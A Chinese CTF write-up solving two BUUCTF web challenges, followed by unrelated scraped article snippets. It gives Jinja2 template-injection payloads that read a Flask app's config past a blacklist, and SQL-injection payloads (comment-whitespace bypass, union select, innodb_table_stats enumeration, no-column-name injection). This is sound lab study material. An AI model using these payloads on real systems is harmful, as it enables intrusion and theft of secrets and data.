小杌
小杌

BUUCTF 25

知识点

Python

  1. url_forget_flashed_messages可参考https://blog.csdn.net/weixin_39808877/article/details/110910717

SQL注入

  1. Mysql5.6及以上版本中 innodb_index_stats 和innodb_table_stats这两个表中都包含所有新创建的数据库和表名
  2. 无列名注入:https://www.jianshu.com/p/6eba3370cfab

25-1 [WesternCTF2018]shrine

做题思路

打开发现代码, ctrl + u查看源码

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{
     {% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

发现是python代码,看到flask,想到模板注入
可以这样测试:

看源码 app.config['FLAG'] = os.environ.pop('FLAG')
推测{ {config}}可查看所有app.config内容,但是这题设了黑名单[‘config’,‘self’]并且过滤了括号
不过python还有一些内置函数,比如url_forget_flashed_messages

BUUCTF 25_第1张图片

url_for

/shrine/{
     {url_for.__globals__}}

 找到了current_app 然后直接访问

/shrine/{
     {url_for.__globals__['current_app'].config['FLAG']}}

get_flashed_message

同理:

/shrine/{
     {get_flashed_messages.__globals__['current_app'].config['FLAG']}}

 

 25-2 [SWPU2019]Web1

做题思路

首先尝试登陆一下,不行,然后注册一个账号

尝试 admin  于是随便注册一个

BUUCTF 25_第2张图片 尝试申请发布广告

尝试了一下没发现什么,然后找WP

据WP得知是 SQL 注入

尝试  显示 

据WP得知利用group by 可以判断出列数

'/**/group/**/by/**/22' 显示 于是在SQL语句后加一个逗号和单引号闭合后面的语句

'/**/group/**/by/**/23,'  显示判断出列数为22

'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

回显位置为2和3.

查表:

'union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

 

然后进行无列名注入

'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from(select/**/1,2,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

你可能感兴趣的:(BUUCTF 25)

  • COMP9321 25T1 后端
    COMP932125T1Assignment1(15marks)IntroductionTheNSWFuelCheckdatasetismaintainedbytheNSWGovernment.ItallowsmotoriststoaccesshistoricalandliveinformationaboutfuelpricesacrossNSW.Wehavedownloadedthe“FuelC
  • Android广播限制Background execution not allowed: receiving Intent { act= 趋势大仙 异常题库android
    “Backgroundexecutionnotallowed:receivingIntent”这个错误信息通常出现在Android应用开发中,特别是在处理后台任务或接收广播(Broadcast)时。这个错误表明应用试图在后台执行某些操作,但Android系统出于电池优化和用户体验的考虑,限制了后台任务的执行。可以尝试以下二种方法:1.把targetSdkVersion设置为25及以下的版本号,重新
  • Day25:剑指 Offer 29. 顺时针打印矩阵 学而知不足~ 剑指offer练习矩阵算法
    题目输入一个矩阵,按照从外向里以顺时针的顺序依次打印出每一个数字。代码实现模拟classSolution{publicint[]spiralOrder(int[][]matrix){if(matrix.length==0){returnnewint[]{};}intm=matrix.length;intn=matrix[0].length;int[]res=newint[m*n];intindex
  • Python基础学习(四):字典 代码死 python学习windows
    1.字典简介字典是一种可变的容器,用于存储键值对。字典中的数据是无序的,键必须是唯一的且不可变。特点:使用大括号{}定义,键值对用冒号:分隔。数据是无序的。键必须是不可变类型(如字符串、数字、元组),值可以是任意类型。2.字典创建2.1使用字面值创建#创建空字典d1={}#创建包含键值对的字典d2={"name":"Alice","age":25,"city":"NewYork"}#键可以是数字d
  • 2021-05-25 张辣鸡 爬虫记录python爬虫
    解决12306抢票系统弹出来的弹窗问题应为疫情原因进入12306网站登陆界面弹出来这样一个界面进入登陆界面的网站,把鼠标放在确定的位置右键点击检查,找到#我把它放在另一个函数中,这样调用就可以了defclick_ok1(self):bounce_button=driver.find_element_by_css_selector(".btn.btn-primary.ok")bounce_butto
  • (c语言)将一个数组逆序输出 WuwuwuH_ C语言C语言数组逆序输出编程算法
    (c语言)将一个数组逆序输出#include#includeintmain(){intarr[10]={0,2,5,7,9,10,13,15,18,25};inti;intlength=(int)sizeof(arr)/sizeof(arr[0]);//判断数组长度(总长度除以单个的长度)printf("数组共有%d个数字\n",length);for(i=length-1;i>0;i--){pr
  • AI在投标管理中的智能化应用设计方案 警世龙 开发记录人工智能自然语言处理深度学习人工智能AI编程
    一、系统设计目标E={e1,e2,e3}其中{e1:标书准备效率提升40%e2:中标率提升25%e3:人工审核工作量降低60%E=\{e_1,e_2,e_3\}\quad\text{其中}\quad\begin{cases}e_1:\text{标书准备效率提升40\%}\\e_2:\text{中标率提升25\%}\\e_3:\text{人工审核工作量降低60\%}\end{cases}E={e1,
  • php后端分页_thinkphp5框架前后端分离项目实现分页功能的方法分析 淡定男 php后端分页
    本文实例讲述了thinkphp5框架前后端分离项目实现分页功能的方法。分享给大家供大家参考,具体如下:方法一利用tp5提供的paginate方法实现自动分页参数page第几页,paginate分页方法会自动获取size每页数量代码/***Notes:消费记录*Date:2019/6/25*Time:15:43*@paramRequest$request*@return\think\response
  • css模拟雷达扫描动画 像牛奶却不是牛奶 css前端
    样式:.radar-scan{background-image:linear-gradient(0deg,transparent24%,rgba(32,255,77,0.15)25%,rgba(32,255,77,0.15)26%,transparent27%,transparent74%,rgba(32,255,77,0.15)75%,rgba(32,255,77,0.15)76%,transp
  • 程序员必看!DeepSeek全栈开发指南:从代码生成到分布式训练的黑科技解析 AI创享派 后端
    一、DeepSeek技术新突破:程序员必须掌握的MoE架构实战2025年2月25日,DeepSeek开源了专为MoE模型设计的DeepEP通信库,这项技术革新直接影响了分布式训练和推理效率。该库支持FP8精度与NVLink/RDMA技术,吞吐量提升3倍以上,特别适合处理千亿级参数的分布式任务。对于后端工程师而言,DeepEP的以下特性值得关注:计算-通信重叠机制:通过回调函数实现GPU资源动态分配
  • Flutter 自定义年月日倒计时 xudailong_blog Flutter开发flutter倒计时年月日android
    因项目中的订单页需要一个定时器,比如下单后需要进行倒计时,等倒计时完后,订单状态自动关闭。如图:这里显示等17分25秒就是我们所需要做的功能。项目里还有其他倒计时类型,比如年月日,天之类的,先上一个工具类://时间格式化,根据总秒数转换为对应的hh:mm:ss格式staticStringconstructTime(intseconds){intday=seconds~/3600~/24;intho
  • 记录一次通过MQTT协议进行数据采集的线上事故:EOFException _半夏曲 java网络开发语言物联网
    记录一次通过MQTT协议进行数据采集的线上事故首先查看项目报错日志:2023-04-1911:25:50-MQTT服務器連接丟失:org.eclipse.paho.client.mqttv3.MqttException:連線遺失atorg.eclipse.paho.client.mqttv3.internal.CommsReceiver.run(CommsReceiver.java:197)atj
  • 2025年开源大模型全景:语言、多模态与开发工具的前沿探索 软件职业规划 开源
    语言类开源大模型1.Llama系列开发者:Meta发布时间:2024年7月参数量:8B、70B、405B特点:Llama系列模型以其强大的多语言支持和广泛的自然语言处理能力而闻名。它支持文本生成、问答、翻译等多种任务,尤其在处理长篇文本时表现出色,支持高达128K的上下文长度。Meta与超过25个合作伙伴共同推出该系列模型,包括亚马逊云科技、Databricks和英伟达等,推动了开源大模型在工业界
  • 马斯克说的没错,DeepSeek确实厉害,但真正可怕的是... PPT百科 人工智能powerpointpptDeepSeek马斯克
    作者:PPT百科(PPTwiki.COM)发布日期:2025年2月25日“中国能做出DeepSeek这样的AI,我一点都不意外。”当马斯克在达沃斯论坛上说出这句话时,全球科技圈的目光再次聚焦到了这个中国AI独角兽身上。然而,这位“硅谷钢铁侠”的下一句话却耐人寻味:“但它还不是革命性的,我们的Grok3会更好。”马斯克的评价看似矛盾,实则揭示了AI竞争的核心逻辑——技术突破与市场落地的双重博弈。而D
  • C++25--lambda表达式 大胆飞猪 c++
    目录1.C++98中的一个例子2.lambda表达式3.lambda表达式语法4.函数对象与lambda表达式1.C++98中的一个例子templatestructgreater{booloperator()(Ta,Tb){returna>b;}};intmain(){intarray[]={4,1,8,5,3,7,0,9,2,6};//默认按照小于比较,排出来结果是升序std::sort(arr
  • 25年大数据开发省赛样题第一套,离线数据处理答案 Tometor 大数据sparkscala
    省赛样题一,数据抽取模块这一模块的作用是从mysql抽取数据到ods层进行指标计算,在题目中要求进行全量抽取,并新增etl-date字段进行分区,日期为比赛前一天importorg.apache.spark.sql.SparkSessionimportjava.util.PropertiesobjectTask1{defmain(args:Array[String]):Unit={valspark
  • P1010 [NOIP 1998 普及组] 幂次方 黄昏岭 算法java
    题目描述任何一个正整数都可以用2的幂次方表示。例如137=27+23+20。同时约定次方用括号来表示,即ab可表示为a(b)。由此可知,137可表示为2(7)+2(3)+2(0)进一步:7=22+2+20(21用2表示),并且3=2+20。所以最后137可表示为2(2(2)+2+2(0))+2(2+2(0))+2(0)。又如1315=210+28+25+2+1所以1315最后可表示为2(2(2+2
  • Python激活码 qq_36357944 Python
    EB101IWSWD-eyJsaWNlbnNlSWQiOiJFQjEwMUlXU1dEIiwibGljZW5zZWVOYW1lIjoibGFuIHl1IiwiYXNzaWduZWVOYW1lIjoiIiwiYXNzaWduZWVFbWFpbCI6IiIsImxpY2Vuc2VSZXN0cmljdGlvbiI6IkZvciBlZHVjYXRpb25hbCB1c2Ugb25seSIsImNoZWNrQ
  • 深入理解信息检索之BM25算法 Lunar* 算法与优化自然语言处理人工智能
    1.BM25算法简介BM25算法,全称为"BestMatching25",是由StephenRobertson和KarenSpärckJones在1990年代初基于早期的概率排名模型(如二元独立检索模型)发展而来。它通过一种概率论的方法来衡量文档与用户查询之间的相关性。2.BM25的核心原理BM25算法的核心在于两个主要的概念:逆文档频率(IDF)和词频(TF)调整。逆文档频率(IDF):IDF用
  • 人形机器人专题:人形机器人产品方案对比,百花齐放,各擅胜场 人工智能学派 搜索引擎
    今天分享的是人形机器人系列深度研究报告:《人形机器人专题:人形机器人产品方案对比,百花齐放,各擅胜场》。(报告出品方:国泰君安证券)报告共计:25页来源:人工智能学派特斯拉人形机器人迭代迅速,从执行层到控制层进化明显特斯拉机器人产品迭代迅速,产品性能进步明显。2021年8月,在特斯拉AIDAY上,马斯克公布人形机器人初步设计方案,仅1年后,Optimus实现了从概念到整机的落地,已具备了行走、拾取
  • 【工厂老板必看】智能切割算法帮您省 30% 原材料!附真实案例——一维下料问题算法、cad c#二次开发 山水CAD筑梦人 CADC#二次开发算法
    一、行业痛点:原材料浪费有多严重?现象:传统人工排料导致大量边角料,例如:某钢材厂每月因切割不合理损失15万元木材加工厂平均浪费率高达25%核心问题:无法兼顾切割数量与材料利用率人工计算耗时且容易出错二、解决方案:贪心算法和遗传算法切割优化系统技术原理(通俗解释):用贪心算法和遗传算法通过编程,自动生成最优切割方案,比人工排料效率高100倍以上!核心优势:省材料:原材料总根数减少20%-40%降成
  • 贪心算法——c# 山水CAD筑梦人 C#学习笔记贪心算法算法
    贪心算法通俗解释贪心算法是一种"每一步都选择当前最优解"的算法策略。它不关心全局是否最优,而是通过局部最优的累积来逼近最终解。优点是简单高效,缺点是可能无法得到全局最优解。一句话秒懂自动售货机找零钱:用最少数量的硬币凑出指定金额。比如找零198美分,它会优先用25美分的大硬币,不够再用小的,直到凑够金额。背景故事想象你在加拿大超市当收银员(CAD场景):顾客买了东西你需要快速找出零钱198分收银台
  • Python个人学习笔记(14):函数(匿名函数、内置函数(下)、三元表达式) NEET_LH 樵夫老师Python零基础课程个人学习笔记python学习笔记
    九、匿名函数lambda表达式语法规则:变量=lambda参数1,参数2,…:返回值例:用lambda简化下述操作deffunc(a,b):returna+bret=func(1,2)print(ret)代码:fn=lambdaa,b:a+bprint(fn)print(fn(12,13))结果:at0x000001E751EAAF20>25可以帮我们一句话创建函数可以与某些内置函数一起用十、内置
  • 安装oVirt环境 唯独不开心 oVirt云计算
    1.oVirtEngine硬件要求资源最低推荐中央处理器双核x86_64CPU.一个四核x86_64CPU或多个双核x86_64CPU。记忆4GB的可用系统RAM(如果未安装DataWarehouse且现有进程未占用内存)。16GB的系统RAM。硬盘25GB本地可访问的可写磁盘空间。50GB本地可访问的可写磁盘空间。您可以使用RHV引擎历史数据库大小计算器来计算引擎历史数据库大小的适当磁盘空间。网
  • Neo4j笔记整理CQL大全 Kugua-F Neo4jNeo4j图形数据库
    工作需要用到知识图谱,学习一下Neo4jCQL常规操作查询关系的父节点match(n)-[r:likes]-()returnn查询节点名称为person的前25条结点记录和查询后25条结点记录match(n:Person)returnnlimit25match(n:Person)returnnskip25查询结点名称为personage=12的所有结点match(n:Person)wheren.a
  • 算力租赁新趋势揭秘:如何高效利用云计算资源赋能未来
    **算力——数字经济的“新石油”在人工智能、大数据、区块链等技术重塑全球经济的今天,算力已成为驱动创新的核心引擎。根据工信部数据,2022年我国算力核心产业规模突破1.8万亿元,算力总规模位居全球第二,而全球算力租赁市场规模已超过千亿美元,并以年复合增长率超过25%的速度扩张。这一背景下,算力租赁作为灵活获取计算资源的新模式,正从边缘走向主流。本文将深入剖析算力租赁的行业新趋势,并揭示如何通过云计
  • 贴片电容的电流、电压、功率和封装关系 又要菜又爱玩还要学 元器件单片机嵌入式硬件pcb工艺
    贴片电容的电流、电压、功率和封装之间存在密切关系,这些参数共同决定了电容的性能和适用场景。以下是它们之间的具体关系:1.电压与封装的关系贴片电容的封装尺寸直接影响其耐压能力。通常,封装越大,能够承受的电压越高。封装尺寸典型耐压范围(V)02016.3V-16V04026.3V-25V060310V-50V080516V-100V120625V-200V121050V-500V高电压应用:需要选择更
  • 论文学习:基于机器学习的光声图像分析1 superace7911 基于机器学习的光声图像处理机器学习人工智能图像处理
    3/25——3/31期间论文学习笔记,关于基于机器学习的光声图像分析的6篇1区论文血管结构模拟&分割:Quantificationofvascularnetworksinphotoacousticmesoscopy链接数据集链接摘要这篇论文提出了一种新的方法,利用中观光声成像(MesoscopicPhotoacousticImaging,PAI)技术和高级图像分析技术,来非侵入性地定量化和分析活体
  • 自学嵌入式第25天------消息队列,共享内存,信号灯 以德服人23 java开发语言
    1.消息队列消息队列的创建与打开:使用msgget()函数创建或打开一个消息队列。需要指定唯一的key值和权限标志(如IPC_CREAT)。消息的发送与接收:使用msgsnd()发送消息到队列。使用msgrcv()从队列中接收消息。消息需要定义特定的数据结构,通常包含mtype(消息类型)和mtext(消息内容)。消息类型(mtype):消息类型用于区分不同的消息,接收方可以根据类型选择性地接收消
  • 《Operating System Concepts》阅读笔记:p228-p257 codists 读书笔记操作系统
    《OperatingSystemConcepts》学习第25天,p228-p257总结,总计30页。一、技术总结1.algorithmevaluation评估CPU调度算法需要考虑的因素有:CPUutilization,responsetime或者throughput。基于以上几个因素,选择依据为:(1)MaximizingCPUutilizationundertheconstraintthatt
  • 安装数据库首次应用 Array_06 javaoraclesql
    可是为什么再一次失败之后就变成直接跳过那个要求 enter full pathname of java.exe的界面 这个java.exe是你的Oracle 11g安装目录中例如:【F:\app\chen\product\11.2.0\dbhome_1\jdk\jre\bin】下的java.exe 。不是你的电脑安装的java jdk下的java.exe! 注意第一次,使用SQL D
  • Weblogic Server Console密码修改和遗忘解决方法 bijian1013 Welogic
            在工作中一同事将Weblogic的console的密码忘记了,通过网上查询资料解决,实践整理了一下。 一.修改Console密码         打开weblogic控制台,安全领域 --> myrealm -->&n
  • IllegalStateException: Cannot forward a response that is already committed Cwind javaServlets
    对于初学者来说,一个常见的误解是:当调用 forward() 或者 sendRedirect() 时控制流将会自动跳出原函数。标题所示错误通常是基于此误解而引起的。 示例代码: protected void doPost() { if (someCondition) { sendRedirect(); } forward(); // Thi
  • 基于流的装饰设计模式 木zi_鸣 设计模式
    当想要对已有类的对象进行功能增强时,可以定义一个类,将已有对象传入,基于已有的功能,并提供加强功能。 自定义的类成为装饰类 模仿BufferedReader,对Reader进行包装,体现装饰设计模式 装饰类通常会通过构造方法接受被装饰的对象,并基于被装饰的对象功能,提供更强的功能。 装饰模式比继承灵活,避免继承臃肿,降低了类与类之间的关系 装饰类因为增强已有对象,具备的功能该
  • Linux中的uniq命令 被触发 linux
    Linux命令uniq的作用是过滤重复部分显示文件内容,这个命令读取输入文件,并比较相邻的行。在正常情 况下,第二个及以后更多个重复行将被删去,行比较是根据所用字符集的排序序列进行的。该命令加工后的结果写到输出文件中。输入文件和输出文件必须不同。如 果输入文件用“- ”表示,则从标准输入读取。 AD: uniq [选项] 文件 说明:这个命令读取输入文件,并比较相邻的行。在正常情况下,第二个
  • 正则表达式Pattern 肆无忌惮_ Pattern
    正则表达式是符合一定规则的表达式,用来专门操作字符串,对字符创进行匹配,切割,替换,获取。   例如,我们需要对QQ号码格式进行检验 规则是长度6~12位  不能0开头  只能是数字,我们可以一位一位进行比较,利用parseLong进行判断,或者是用正则表达式来匹配[1-9][0-9]{4,14} 或者 [1-9]\d{4,14} &nbs
  • Oracle高级查询之OVER (PARTITION BY ..) 知了ing oraclesql
    一、rank()/dense_rank() over(partition by ...order by ...) 现在客户有这样一个需求,查询每个部门工资最高的雇员的信息,相信有一定oracle应用知识的同学都能写出下面的SQL语句: select e.ename, e.job, e.sal, e.deptno from scott.emp e, (se
  • Python调试 矮蛋蛋 pythonpdb
    原文地址: http://blog.csdn.net/xuyuefei1988/article/details/19399137 1、下面网上收罗的资料初学者应该够用了,但对比IBM的Python 代码调试技巧: IBM:包括 pdb 模块、利用 PyDev 和 Eclipse 集成进行调试、PyCharm 以及 Debug 日志进行调试: http://www.ibm.com/d
  • webservice传递自定义对象时函数为空,以及boolean不对应的问题 alleni123 webservice
    今天在客户端调用方法 NodeStatus status=iservice.getNodeStatus(). 结果NodeStatus的属性都是null。 进行debug之后,发现服务器端返回的确实是有值的对象。 后来发现原来是因为在客户端,NodeStatus的setter全部被我删除了。 本来是因为逻辑上不需要在客户端使用setter, 结果改了之后竟然不能获取带属性值的
  • java如何干掉指针,又如何巧妙的通过引用来操作指针————>说的就是java指针 百合不是茶
    C语言的强大在于可以直接操作指针的地址,通过改变指针的地址指向来达到更改地址的目的,又是由于c语言的指针过于强大,初学者很难掌握, java的出现解决了c,c++中指针的问题 java将指针封装在底层,开发人员是不能够去操作指针的地址,但是可以通过引用来间接的操作:   定义一个指针p来指向a的地址(&是地址符号):        
  • Eclipse打不开,提示“An error has occurred.See the log file ***/.log” bijian1013 eclipse
    打开eclipse工作目录的\.metadata\.log文件,发现如下错误: !ENTRY org.eclipse.osgi 4 0 2012-09-10 09:28:57.139 !MESSAGE Application error !STACK 1 java.lang.NoClassDefFoundError: org/eclipse/core/resources/IContai
  • spring aop实例annotation方法实现 bijian1013 javaspringAOPannotation
            在spring aop实例中我们通过配置xml文件来实现AOP,这里学习使用annotation来实现,使用annotation其实就是指明具体的aspect,pointcut和advice。1.申明一个切面(用一个类来实现)在这个切面里,包括了advice和pointcut AdviceMethods.jav
  • [Velocity一]Velocity语法基础入门 bit1129 velocity
    用户和开发人员参考文档 http://velocity.apache.org/engine/releases/velocity-1.7/developer-guide.html   注释 1.行级注释## 2.多行注释#*  *#   变量定义 使用$开头的字符串是变量定义,例如$var1, $var2,   赋值 使用#set为变量赋值,例
  • 【Kafka十一】关于Kafka的副本管理 bit1129 kafka
    1. 关于request.required.acks   request.required.acks控制者Producer写请求的什么时候可以确认写成功,默认是0, 0表示即不进行确认即返回。 1表示Leader写成功即返回,此时还没有进行写数据同步到其它Follower Partition中 -1表示根据指定的最少Partition确认后才返回,这个在   Th
  • lua统计nginx内部变量数据 ronin47 lua nginx  统计
    server { listen 80; server_name photo.domain.com; location /{set $str $uri; content_by_lua ' local url = ngx.var.uri local res = ngx.location.capture(
  • java-11.二叉树中节点的最大距离 bylijinnan java
    import java.util.ArrayList; import java.util.List; public class MaxLenInBinTree { /* a. 1 / \ 2 3 / \ / \ 4 5 6 7 max=4 pass "root"
  • Netty源码学习-ReadTimeoutHandler bylijinnan javanetty
    ReadTimeoutHandler的实现思路: 开启一个定时任务,如果在指定时间内没有接收到消息,则抛出ReadTimeoutException 这个异常的捕获,在开发中,交给跟在ReadTimeoutHandler后面的ChannelHandler,例如 private final ChannelHandler timeoutHandler = new ReadTim
  • jquery验证上传文件样式及大小(好用) cngolon 文件上传jquery验证
    <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <script src="jquery1.8/jquery-1.8.0.
  • 浏览器兼容【转】 cuishikuan css浏览器IE
    浏览器兼容问题一:不同浏览器的标签默认的外补丁和内补丁不同 问题症状:随便写几个标签,不加样式控制的情况下,各自的margin 和padding差异较大。 碰到频率:100% 解决方案:CSS里    *{margin:0;padding:0;} 备注:这个是最常见的也是最易解决的一个浏览器兼容性问题,几乎所有的CSS文件开头都会用通配符*来设
  • Shell特殊变量:Shell $0, $#, $*, $@, $?, $$和命令行参数 daizj shell$#$?特殊变量
    前面已经讲到,变量名只能包含数字、字母和下划线,因为某些包含其他字符的变量有特殊含义,这样的变量被称为特殊变量。例如,$ 表示当前Shell进程的ID,即pid,看下面的代码: $echo $$ 运行结果 29949   特殊变量列表 变量 含义 $0 当前脚本的文件名 $n 传递给脚本或函数的参数。n 是一个数字,表示第几个参数。例如,第一个
  • 程序设计KISS 原则-------KEEP IT SIMPLE, STUPID! dcj3sjt126com unix
    翻到一本书,讲到编程一般原则是kiss:Keep It Simple, Stupid.对这个原则深有体会,其实不仅编程如此,而且系统架构也是如此。 KEEP IT SIMPLE, STUPID! 编写只做一件事情,并且要做好的程序;编写可以在一起工作的程序,编写处理文本流的程序,因为这是通用的接口。这就是UNIX哲学.所有的哲学真 正的浓缩为一个铁一样的定律,高明的工程师的神圣的“KISS 原
  • android Activity间List传值 dcj3sjt126com Activity
    第一个Activity: import java.util.ArrayList;import java.util.HashMap;import java.util.List;import java.util.Map;import android.app.Activity;import android.content.Intent;import android.os.Bundle;import a
  • tomcat 设置java虚拟机内存 eksliang tomcat 内存设置
    转载请出自出处:http://eksliang.iteye.com/blog/2117772 http://eksliang.iteye.com/ 常见的内存溢出有以下两种: java.lang.OutOfMemoryError: PermGen space java.lang.OutOfMemoryError: Java heap space   ------------
  • Android 数据库事务处理 gqdy365 android
    使用SQLiteDatabase的beginTransaction()方法可以开启一个事务,程序执行到endTransaction() 方法时会检查事务的标志是否为成功,如果程序执行到endTransaction()之前调用了setTransactionSuccessful() 方法设置事务的标志为成功则提交事务,如果没有调用setTransactionSuccessful() 方法则回滚事务。事
  • Java 打开浏览器 hw1287789687 打开网址open浏览器open browser打开url打开浏览器
    使用java 语言如何打开浏览器呢? 我们先研究下在cmd窗口中,如何打开网址 使用IE 打开 D:\software\bin>cmd /c start iexplore http://hw1287789687.iteye.com/blog/2153709 使用火狐打开 D:\software\bin>cmd /c start firefox http://hw1287789
  • ReplaceGoogleCDN:将 Google CDN 替换为国内的 Chrome 插件 justjavac chromeGooglegoogle apichrome插件
    Chrome Web Store 安装地址: https://chrome.google.com/webstore/detail/replace-google-cdn/kpampjmfiopfpkkepbllemkibefkiice 由于众所周知的原因,只需替换一个域名就可以继续使用Google提供的前端公共库了。 同样,通过script标记引用这些资源,让网站访问速度瞬间提速吧
  • 进程VS.线程 m635674608 线程
    资料来源: http://www.liaoxuefeng.com/wiki/001374738125095c955c1e6d8bb493182103fac9270762a000/001397567993007df355a3394da48f0bf14960f0c78753f000 1、Apache最早就是采用多进程模式 2、IIS服务器默认采用多线程模式 3、多进程优缺点 优点: 多进程模式最大
  • Linux下安装MemCached 字符串 memcached
    前提准备:1. MemCached目前最新版本为:1.4.22,可以从官网下载到。2. MemCached依赖libevent,因此在安装MemCached之前需要先安装libevent。2.1 运行下面命令,查看系统是否已安装libevent。[root@SecurityCheck ~]# rpm -qa|grep libevent libevent-headers-1.4.13-4.el6.n
  • java设计模式之--jdk动态代理(实现aop编程) Supanccy2013 javaDAO设计模式AOP
        与静态代理类对照的是动态代理类,动态代理类的字节码在程序运行时由Java反射机制动态生成,无需程序员手工编写它的源代码。动态代理类不仅简化了编程工作,而且提高了软件系统的可扩展性,因为Java 反射机制可以生成任意类型的动态代理类。java.lang.reflect 包中的Proxy类和InvocationHandler 接口提供了生成动态代理类的能力。 &
  • Spring 4.2新特性-对java8默认方法(default method)定义Bean的支持 wiselyman spring 4
    2.1 默认方法(default method) java8引入了一个default medthod; 用来扩展已有的接口,在对已有接口的使用不产生任何影响的情况下,添加扩展 使用default关键字 Spring 4.2支持加载在默认方法里声明的bean 2.2 将要被声明成bean的类 public class DemoService {
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他